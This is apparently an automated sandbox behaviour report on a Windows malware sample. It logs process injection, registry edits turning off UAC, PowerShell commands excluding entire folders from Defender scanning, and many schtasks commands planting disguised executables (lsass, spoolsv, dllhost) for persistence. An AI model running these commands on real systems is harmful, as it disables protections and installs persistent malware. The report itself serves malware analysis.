PID 4136 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 932 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 4136 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 4648 wrote to memory of 652 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 652 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 2628 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 4648 wrote to memory of 2628 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 652 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 652 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 3092 wrote to memory of 2528 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2528 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2044 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 3092 wrote to memory of 2044 N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe C:\Windows\System32\WScript.exe
PID 2528 wrote to memory of 4132 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe
PID 2528 wrote to memory of 4132 N/A C:\Windows\System32\WScript.exe C:\Recovery\WindowsRE\MoUsoCoreWorker.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\L2Schemas\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\L2Schemas\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\L2Schemas\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 6 /tr "'C:\Users\Public\AccountPictures\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 11 /tr "'C:\Program Files\VideoLAN\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZQqiTadxcN.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Windows\it-IT\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Application Data\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Public\AccountPictures\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\MoUsoCoreWorker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files\Uninstall Information\upfc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\Admin\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Desktop\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\NetHood\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\networklist\icons\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

